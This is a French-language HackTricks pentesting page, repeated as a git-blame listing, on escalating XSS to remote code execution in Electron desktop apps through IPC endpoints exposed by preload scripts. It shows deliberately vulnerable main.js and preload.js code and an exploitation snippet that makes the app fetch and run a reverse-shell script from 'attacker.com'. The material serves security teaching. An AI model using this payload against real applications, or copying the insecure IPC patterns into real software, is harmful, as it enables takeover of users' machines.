hacktricks/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-ipc.md

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !

- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)

- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>


Si le script de préchargement expose un point de terminaison IPC à partir du fichier main.js, le processus de rendu pourra y accéder et, s'il est vulnérable, une RCE pourrait être possible.

**Tous ces exemples ont été pris ici** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo)

# Exemple 1

Vérifiez comment `main.js` écoute `getUpdate` et **télécharge et exécute n'importe quelle URL** passée.\
Vérifiez également comment `preload.js` **expose tout événement IPC** de main.
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
	console.log('getUpdate: ' + url)
	mainWindow.webContents.downloadURL(url)
	mainWindow.download_url = url
});
  
mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
	console.log('downloads path=' + app.getPath('downloads'))
	console.log('mainWindow.download_url=' + mainWindow.download_url);
	url_parts = mainWindow.download_url.split('/')
	filename = url_parts[url_parts.length-1]
	mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
	console.log('downloadPath=' + mainWindow.downloadPath)
	// Set the save path, making Electron not to prompt a save dialog.
	item.setSavePath(mainWindow.downloadPath)

	item.on('updated', (event, state) => {
		if (state === 'interrupted') {
			console.log('Download is interrupted but can be resumed')
		}
		else if (state === 'progressing') {
			if (item.isPaused()) console.log('Download is paused')
			else console.log(`Received bytes: ${item.getReceivedBytes()}`)
		}
	})

	item.once('done', (event, state) => {
		if (state === 'completed') {
			console.log('Download successful, running update')
			fs.chmodSync(mainWindow.downloadPath, 0755);
			var child = require('child_process').execFile;
			child(mainWindow.downloadPath, function(err, data) {
				if (err) { console.error(err); return; }
				console.log(data.toString());
			});
      			}
		else console.log(`Download failed: ${state}`)
	})
}) 
```

```javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
	ipcRenderer.send(event, data);
};
```
Exploitation :
```html
<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>
```
# Exemple 2

Si le script de préchargement expose directement au rendu une façon d'appeler shell.openExternal, il est possible d'obtenir une RCE.
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
	shell.openExternal(url);
};
```
# Exemple 3

Si le script de préchargement expose des moyens de communiquer complètement avec le processus principal, une XSS pourra envoyer n'importe quel événement. L'impact de cela dépend de ce que le processus principal expose en termes d'IPC.
```javascript
window.electronListen = (event, cb) => {
	ipcRenderer.on(event, cb);
};

window.electronSend = (event, data) => {
	ipcRenderer.send(event, data);
};
```
<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Travaillez-vous dans une entreprise de **cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !

- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)

- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) **groupe Discord** ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Rejoignez le [💬](https://emojipedia.org/speech-balloon/) [groupe Discord](https://discord.gg/hRep4RUj7f) ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`


Translated to French 2023-06-03 13:10:46 +00:00			`Si le script de préchargement expose un point de terminaison IPC à partir du fichier main.js, le processus de rendu pourra y accéder et, s'il est vulnérable, une RCE pourrait être possible.`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Tous ces exemples ont été pris ici [https://www.youtube.com/watch?v=xILfQGkLXQo](https://www.youtube.com/watch?v=xILfQGkLXQo)`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`# Exemple 1`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			Vérifiez comment `main.js` écoute `getUpdate` et télécharge et exécute n'importe quelle URL passée.\
			Vérifiez également comment `preload.js` expose tout événement IPC de main.
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00			```javascript
			`// Part of code of main.js`
			`ipcMain.on('getUpdate', (event, url) => {`
			`console.log('getUpdate: ' + url)`
			`mainWindow.webContents.downloadURL(url)`
			`mainWindow.download_url = url`
			`});`

			`mainWindow.webContents.session.on('will-download', (event, item, webContents) => {`
			`console.log('downloads path=' + app.getPath('downloads'))`
			`console.log('mainWindow.download_url=' + mainWindow.download_url);`
			`url_parts = mainWindow.download_url.split('/')`
			`filename = url_parts[url_parts.length-1]`
			`mainWindow.downloadPath = app.getPath('downloads') + '/' + filename`
			`console.log('downloadPath=' + mainWindow.downloadPath)`
			`// Set the save path, making Electron not to prompt a save dialog.`
			`item.setSavePath(mainWindow.downloadPath)`

			`item.on('updated', (event, state) => {`
			`if (state === 'interrupted') {`
			`console.log('Download is interrupted but can be resumed')`
			`}`
			`else if (state === 'progressing') {`
			`if (item.isPaused()) console.log('Download is paused')`
			else console.log(`Received bytes: ${item.getReceivedBytes()}`)
			`}`
			`})`

			`item.once('done', (event, state) => {`
			`if (state === 'completed') {`
			`console.log('Download successful, running update')`
			`fs.chmodSync(mainWindow.downloadPath, 0755);`
			`var child = require('child_process').execFile;`
			`child(mainWindow.downloadPath, function(err, data) {`
			`if (err) { console.error(err); return; }`
			`console.log(data.toString());`
			`});`
			`}`
			else console.log(`Download failed: ${state}`)
			`})`
			`})`
			```

			```javascript
			`// Part of code of preload.js`
			`window.electronSend = (event, data) => {`
			`ipcRenderer.send(event, data);`
			`};`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`Exploitation :`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00			```html
			`<script>`
			`electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");`
			`</script>`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`# Exemple 2`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Si le script de préchargement expose directement au rendu une façon d'appeler shell.openExternal, il est possible d'obtenir une RCE.`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00			```javascript
			`// Part of preload.js code`
			`window.electronOpenInBrowser = (url) => {`
			`shell.openExternal(url);`
			`};`
			```
Translated to French 2023-06-03 13:10:46 +00:00			`# Exemple 3`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`Si le script de préchargement expose des moyens de communiquer complètement avec le processus principal, une XSS pourra envoyer n'importe quel événement. L'impact de cela dépend de ce que le processus principal expose en termes d'IPC.`
GitBook: [#3133] No subject 2022-04-28 13:04:05 +00:00			```javascript
			`window.electronListen = (event, cb) => {`
			`ipcRenderer.on(event, cb);`
			`};`

			`window.electronSend = (event, data) => {`
			`ipcRenderer.send(event, data);`
			`};`
			```
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les [PLANS D'ABONNEMENT](https://github.com/sponsors/carlospolop) !`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Découvrez [The PEASS Family](https://opensea.io/collection/the-peass-family), notre collection exclusive de [NFTs](https://opensea.io/collection/the-peass-family)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Obtenez le [swag officiel PEASS & HackTricks](https://peass.creator-spring.com)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Rejoignez le [💬](https://emojipedia.org/speech-balloon/) groupe Discord ou le [groupe telegram](https://t.me/peass) ou suivez moi sur Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to French 2023-06-03 13:10:46 +00:00			`- Partagez vos astuces de piratage en soumettant des PR au [repo hacktricks](https://github.com/carlospolop/hacktricks) et au [repo hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`